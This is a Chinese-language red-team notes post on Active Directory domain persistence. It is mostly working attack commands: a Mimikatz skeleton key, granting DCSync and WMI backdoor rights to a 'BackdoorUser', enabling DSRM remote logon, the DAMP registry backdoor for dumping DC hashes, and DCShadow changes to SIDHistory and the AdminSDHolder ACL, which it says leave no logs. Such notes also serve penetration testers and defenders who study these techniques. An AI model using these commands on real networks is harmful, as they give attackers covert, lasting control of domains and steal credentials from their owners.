红队笔记 - 域渗透攻击

littlebird

转载自：红队笔记 - 域渗透攻击                                                            

文章来源：Khan安全攻防实验室

红队笔记 - 域渗透攻击                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    

littlebird

域持久性

        

        必须以DA权限运行


Mimikatz攻击

        

        DC运行为所有用户启用密码 "mimikatz"

1. privilege::debug
   
2. misc::skeleton

复制代码

使用 PowerView 授予特定用户 DCSync 权限

        

        选择的用户授予 DCSync 的权限，在某些设置中可能会逃避检测。

1. Add-ObjectACL -TargetDistinguishedName "dc=targetdomain,dc=com" -PrincipalSamAccountName BackdoorUser -Rights DCSync

复制代码

域控制器 DSRM 管理员

      

        DSRM 管理员是 DC 的本地管理员帐户，需要先启用远程登录。

1. New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

复制代码

现在我们可以使用之前转储在 DC 上的本地管理哈希远程登录，使用例如“ overpass -the-hash”来获取会话。


修改远程 WMI 访问的安全描述符

        

        使用Nishang 的 Set-RemoteWMI cmdlet授予用户 WMI 访问计算机的权限。可以运行以持久访问例如 DC。

1. Set-RemoteWMI -UserName BackdoorUser -ComputerName dc.targetdomain.com -namespace 'root\cimv2'

复制代码

DAMP 修改 DC 注册表安全描述符以进行远程hash检索


        使用DAMP工具我们就可以借壳DC注册表来给我们上的访问SAM，SYSTEM以及SECURITY注册表配置单元，这允许我们远程转储 DChash。

1. Add-RemoteRegBackdoor -ComputerName dc.targetdomain.com -Trustee BackdoorUser

复制代码

        我们使用Add-RemoteRegBackdoor.ps1来自 DAMP的cmdlet添加后门。

1. 
   
2. # Get machine account hash for silver ticket attack
   
3. Get-RemoteMachineAccountHash -ComputerName DC01
   
4. 
   
5. # Get local account hashes
   
6. Get-RemoteLocalAccountHash -ComputerName DC01
   
7. 
   
8. # Get cached credentials (if any)
   
9. Get-RemoteCachedCredential -ComputerName DC01

复制代码

DCShadow


           DCShadow是一种攻击，它通过暂时模仿一个域控制器来掩盖某些行动。如果你在一个根域中拥有域管理员或企业管理员的权限，它可以被用于森林级的持久化。


        作为域管理员，可以选择给一个选定的用户以DCShadow攻击所需的权限（使用Set-DCShadowPermissions.ps1 cmdlet）

1. Set-DCShadowPermissions -FakeDC BackdoorMachine -SamAccountName TargetUser -Username BackdoorUser -Verbose

复制代码

然后，从任何一台机器上使用Mimikatz来进行DCShadow攻击。

1. 
   
2. # Set SPN for user
   
3. lsadump::dcshadow /object:TargetUser /attribute:servicePrincipalName /value:"SuperHacker/ServicePrincipalThingey"
   
4. 
   
5. # Set SID History for user (effectively granting them Enterprise Admin rights)
   
6. lsadump::dcshadow /object:TargetUser /attribute:SIDHistory /value:S-1-5-21-280534878-1496970234-700767426-519
   
7. 
   
8. # Set Full Control permissions on AdminSDHolder container for user
   
9. ## Requires retrieval of current ACL:
   
10. (New-Object System.DirectoryServices.DirectoryEntry("LDAP://CN=AdminSDHolder,CN=System,DC=targetdomain,DC=com")).psbase.ObjectSecurity.sddl
    
11. 
    
12. ## Then get target user SID:
    
13. Get-NetUser -UserName BackdoorUser | select objectsid
    
14. 
    
15. ## Finally, add full control primitive (A;;CCDCLCSWRPWPLOCRRCWDWO;;;[SID]) for user
    
16. lsadump::dcshadow /object:CN=AdminSDHolder,CN=System,DC=targetdomain,DC=com /attribute:ntSecurityDescriptor /value:O:DAG:DAD:PAI(A;;LCRPLORC;;;AU)[...currentACL...](A;;CCDCLCSWRPWPLOCRRCWDWO;;;[[S-1-5-21-1874506631-3219952063-538504511-45109]])

复制代码

最后，从DA会话或之前提供DCShadow权限的用户会话，运行DCShadow攻击。之前的动作将被执行，不会留下任何日志。

1. lsadump::dcshadow /push

复制代码